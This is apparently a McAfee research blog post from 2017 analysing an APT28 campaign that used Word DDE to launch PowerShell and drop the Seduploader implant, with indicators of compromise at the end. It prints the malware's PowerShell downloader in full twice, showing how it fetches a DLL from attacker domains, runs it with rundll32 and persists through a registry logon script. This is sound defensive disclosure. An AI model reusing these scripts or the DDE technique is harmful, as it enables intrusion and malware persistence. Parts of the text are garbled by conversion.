# Threat Group APT28 Slips Office Malware� into Doc Citing NYC Terror Attack **[By Ryan Sherstobitoff and Michael Rea on Nov 07, 2017](https://securingtomorrow.mcafee.com/author/ryan-sherstobitoff/)** **During our monitoring of activities around the APT28 threat group, McAfee Advanced Threat Research analysts** **identified a malicious Word document that appears to leverage the Microsoft Office Dynamic Data Exchange (DDE)�** **technique that has been previously reported by Advanced Threat Research. This document likely marks the first�** **observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary** **code on a victim’s system regardless whether macros are enabled. (McAfee product detection is covered in the** **Indicators of Compromise section at the end of the document.)** **APT28 has recently focused on using different themes. In this case it capitalized on the recent terrorist attack in** **New York City. The document itself is blank. Once opened, the document contacts a control server to drop the first�** **stage of the malware, Seduploader, onto a victim’s system.** **The domain involved in the distribution of Seduploader was created on October 19, 11 days prior to the creation of** **Seduploader.** **The document we examined for this post:** **Filename: IsisAttackInNewYork.docx** **Sha1: 1c6c700ceebfbe799e115582665105caa03c5c9e** **Creation date: 2017-10-27T22:23:00Z** **The document uses the recently detailed DDE technique found in Office products to invoke the command prompt�** **to invoke PowerShell, which runs two commands. The first:�** **C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe** **NoP sta NonI W Hidden $e=(New Object** ----- **#.EXE** **The second PowerShell command is Base64 encoded and is found in the version of config.txt received from the�** **remote server. It decodes as follows:** **$W=New-Object System.Net.WebClient;** **$p=($Env:ALLUSERSPROFILE+”\vms.dll”);** **[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};�** **$W.DownloadFile(“hxxp://netmediaresources[.]com/media/resource/vms.dll “,$p);** **if (Test-Path $p){** **$rd_p=$Env:SYSTEMROOT+”\System32\rundll32.exe”;** **$p_a=$p+”,#1″;** **$pr=Start-Process $rd_p -ArgumentList $p_a;** **$p_bat=($Env:ALLUSERSPROFILE+”\vms.bat”);** **$text=’set inst_pck = “%ALLUSERSPROFILE%\vms.dll”‘+”`r`n”+’if NOT exist %inst_pck % (exit)’+”`r`n”+’start** **rundll32.exe %inst_pck %,#1’** **[io.File]::WriteAllText($p_bat,$text)** **New-Item -Path ‘HKCU:\Environment’ -Force | Out-Null;** **New-ItemProperty -Path ‘HKCU:\Environment’ -Name ‘UserInitMprLogonScript’ -Value “$p_bat” -** **PropertyType String -Force | Out-Null;** **}** **The PowerShell scripts contact the following URL to download Seduploader:** **hxxp://netmediaresources[.]com/media/resource/vms.dll** **The Seduploader sample has the following artifacts:** **Filename: vms.dll** **Sha1: 4bc722a9b0492a50bd86a1341f02c74c0d773db7** **Compile date: 2017-10-31 20:11:10** **Control server: webviewres[.]net** **The document downloads a version of the Seduploader first-stage reconnaissance implant, which profiles�** **prospective victims, pulling basic host information from the infected system to the attackers. If the system is of** **interest, then the installation of X-Agent or Sedreco usually follows.** **We have observed APT28 using Seduploader as a first-stage payload for several years from various public�** **reporting. Based on structural code analysis of recent payloads observed in the campaign, we see they are** **identical to previous Seduploader samples employed by APT28.** **We identified the control server domain associated with this activity as webviewres[.]net, which is consistent with�** **past APT28 domain registration techniques that spoof legitimate-sounding infrastructure. This domain was** **registered on October 25, a few days before the payload and malicious documents were created. The domain was** **first active on October 29, just days before this version of Seduploader was compiled. The IP currently resolves to�** **185.216.35.26 and is hosted on the name servers ns1.njal.la and ns2.njal.la.** **Further McAfee research identified the following related sample:�** **Fil** **t dll** ----- **Compile date: 2017-10-30 23:53:02** **Control server: satellitedeluxpanorama[.]com. (This domain uses the same name servers as above.)** **The preceding sample most likely belongs to the same campaign. Based on our analysis it uses the same** **techniques and payload. We can clearly establish that the campaign involving documents using DDE techniques** **began on October 25.** **The domain satellitedeluxpanorama[.]com, used by the implant secnt.dll, resolved to 89.34.111.160 as of** **November 5. The malicious document 68c2809560c7623d2307d8797691abf3eafe319a is responsible for dropping** **the Seduploader payload (secnt.dll). Its original file name was SaberGuardian2017.docx. This document was�** **created on October 27. The document is distributed from hxxp://sendmevideo[.]org/SaberGuardian2017.docx. The** **document calls sendmevideo[.]org/dh2025e/eh.dll to download Seduploader** **(ab354807e687993fbeb1b325eb6e4ab38d428a1e).** **The PowerShell command embedded in this document:** **$W=New-Object System.Net.WebClient;** **$p=($Env:ALLUSERSPROFILE+”\mvdrt.dll”);** **[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};�** **$W.DownloadFile(“http://sendmevideo.org/dh2025e/eh.dll”,$p);** **if (Test-Path $p){** **$rd_p=$Env:SYSTEMROOT+”\System32\rundll32.exe”;** **$p_a=$p+”,#1″;** **$pr=Start-Process $rd_p -ArgumentList $p_a;** **$p_bat=($Env:ALLUSERSPROFILE+”\mvdrt.bat”);** **$text=’set inst_pck = “%ALLUSERSPROFILE%\mvdrt.dll”‘+”`r`n”+’if NOT exist %inst_pck % (exit)’+”`r`n”+’start** **rundll32.exe %inst_pck %,#1’** **[io.File]::WriteAllText($p_bat,$text)** **New-Item -Path ‘HKCU:\Environment’ -Force | Out-Null;** **New-ItemProperty -Path ‘HKCU:\Environment’ -Name ‘UserInitMprLogonScript’ -Value “$p_bat” -** **PropertyType String -Force | Out-Null;** **}** **The file vms.dll, 4bc722a9b0492a50bd86a1341f02c74c0d773db7, is 99% similar-to secnt.dll�** **ab354807e687993fbeb1b325eb6e4ab38d428a1e, indicating the code is almost identical and highly likely to be part** **of the same campaign. These two DLL implants are likely part of the same campaign. Furthermore, the sample** ----- **[conference Cy Con U.S.](http://aci.cvent.com/events/2017-international-conference-on-cyber-conflict-cycon-u-s-/event-summary-004d598d31684f21ac82050a9000369f.aspx)** **The attack techniques in the two campaigns differ: The campaign spoofing the Cy Con U.S conference used�** **document files to execute a malicious VBA script; this campaign using the terrorist theme uses DDE within a�** **document file to execute PowerShell and fetches a remote payload from a distribution site. The payloads,�** **however, are identical for both campaigns.** ### Conclusion **APT28 is a resourceful threat actor that not only capitalizes on recent events to trick potential victims into** **infections, but can also rapidly incorporate new exploitation techniques to increase its success. Given the publicity** **the Cy Con U.S campaign received in the press, it is possible APT28 actors moved away from using the VBA script** **employed in past actions and chose to incorporate the DDE technique to bypass network defenses. Finally, the use** **of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight** **APT28’s ability and interest in exploiting geopolitical events for their operations.** ### Indicators of Compromise **SHA1 Hashes** **ab354807e687993fbeb1b325eb6e4ab38d428a1e (vms.dll, Seduploader implant)** **4bc722a9b0492a50bd86a1341f02c74c0d773db7 (secnt.dll, Seduploader implant)** **1c6c700ceebfbe799e115582665105caa03c5c9e (IsisAttackInNewYork.docx)** **68c2809560c7623d2307d8797691abf3eafe319a (SaberGuardian.docx)** **Domains** **webviewres[.]net** **netmediaresources[.]com** **IPs** **185.216.35.26** **89.34.111.160** **McAfee coverage** **McAfee products detect this threat as RDN/Generic Downloader.x.** **[Previous Article](https://securingtomorrow.mcafee.com/consumer/family-safety/kids-glued-youtube-7-ways-keep-safe/)** **[Categories: McAfee Labs](https://securingtomorrow.mcafee.com/category/mcafee-labs/)** **[Tags: computer security, cybersecurity, endpoint protection](https://securingtomorrow.mcafee.com/tag/computer-security/)** ## L a a pl ----- **Facebook Comments ()** **Comments (0)** **G+ Comments** ## Leave a Comment **Comment** **Name *** **Email *** **Please enter an answer in digits:** **thirteen − 7 =** **Post CommentPost Comment** ## Newsletter Sign Up **First Name** **Last name** **Email** **Post CommentPost Comment** **Subscribe** ## McAfee on Twitter ----- **[mcafee_labs](https://www.twitter.com/mcafee_labs)** **[Breaking: threat group #APT28 attempted to capitalize on the recent terrorist attack in NYC. What we](https://twitter.com/#search?q=APT28)** **[know so far. https://t.co/UPUc9YMo0x](https://t.co/UPUc9YMo0x)** **3 hours ago** **[Reply · Retweet · Favorite](https://twitter.com/intent/tweet?in_reply_to=927969370877386753)** **[mcafee_labs](https://www.twitter.com/mcafee_labs)** **[RT @fr0gger_: Our @McAfee_Labs Threat Report highlight the use of digitally signed #Malware as](https://twitter.com/fr0gger_)** **[evasion trick #UnprotectProject](https://twitter.com/#search?q=UnprotectProject)** **[https://t.co…](https://t.co)** **5 hours ago** **[Reply · Retweet · Favorite](https://twitter.com/intent/tweet?in_reply_to=927946253442232321)** **[mcafee_labs](https://www.twitter.com/mcafee_labs)** **[Our new decryption tool, Ransomware Recover Mr^2, will be available for free to the #security](https://twitter.com/#search?q=security)** **[community. Details.… https://t.co/4blhyfdl8p](https://t.co/4blhyfdl8p)** **17 hours ago** **[Reply · Retweet · Favorite](https://twitter.com/intent/tweet?in_reply_to=927761298347253760)** ## Previous Article **© 2017 McAfee LLC** **Close Menu** **Search** **[Business](https://securingtomorrow.mcafee.com/category/business/)** **[Consumer](https://securingtomorrow.mcafee.com/category/consumer/)** **[Executive Perspectives](https://securingtomorrow.mcafee.com/category/executive-perspectives/)** **[McAfee Partners](https://securingtomorrow.mcafee.com/category/mcafee-partners/)** **[McAfee Labs](https://securingtomorrow.mcafee.com/category/mcafee-labs/)** ----- **English** **Follow us** **[About](https://www.mcafee.com/us/about-us.aspx)** **Subscribe** **[Contact & Media Requests](https://www.mcafee.com/us/about/contact-us.aspx#ht=tab-publicrelations)** **[Privacy Policy](https://www.mcafee.com/common/privacy/english/index.htm)** **[Legal](https://www.mcafee.com/us/about/legal/legal-notices.aspx)** **© McAfee LLC** -----